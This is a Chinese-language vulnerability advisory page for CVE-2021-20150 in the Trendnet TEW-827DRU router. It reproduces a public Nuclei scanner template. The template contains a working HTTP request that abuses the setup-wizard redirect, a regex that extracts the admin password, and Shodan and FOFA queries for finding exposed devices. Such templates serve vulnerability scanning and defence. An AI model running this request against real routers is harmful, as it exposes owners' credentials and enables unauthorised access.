CVE-2021-20150: Trendnet AC2600 TEW-827DRU - Credentials Disclosure

日期: 2025-08-01 | 影响软件: Trendnet AC2600 TEW-827DRU | POC: 已公开

漏洞描述

Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.

PoC代码[已公开]

id: CVE-2021-20150

info:
  name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure
  author: gy741
  severity: medium
  description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
  impact: |
    An attacker can obtain sensitive credentials, leading to unauthorized access to the router.
  remediation: |
    Update the router firmware to the latest version to fix the vulnerability.
  reference:
    - https://www.tenable.com/security/research/tra-2021-54
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20150
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-20150
    cwe-id: CWE-306
    epss-score: 0.38799
    epss-percentile: 0.97171
    cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: trendnet
    product: tew-827dru_firmware
    shodan-query:
      - http.html:"TEW-827DRU"
      - http.html:"tew-827dru"
    fofa-query: body="tew-827dru"
  tags: cve2021,cve,disclosure,router,tenable,trendnet

http:
  - raw:
      - |
        POST /apply_sec.cgi HTTP/1.1
        Host: {{Hostname}}

        action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'ftp_username'
          - 'ftp_password'
          - 'ftp_permission'
          - 'TEW-827DRU'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: password
        group: 1
        regex:
          - '<input name="admin_passwd" type="password" id="admin_passwd" size="20" maxlength="15" value ="(.*)" />'
        part: body
# digest: 4b0a00483046022100bb98e3c8a73baaf3e221d7c5b687fb8cb08cb233ed6079391fbbbb864f40dc21022100c08ca8f45306272f114f14335bbc3e5e9022f7adaab229b91cc124daf579037e:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-20150.yaml

相关漏洞推荐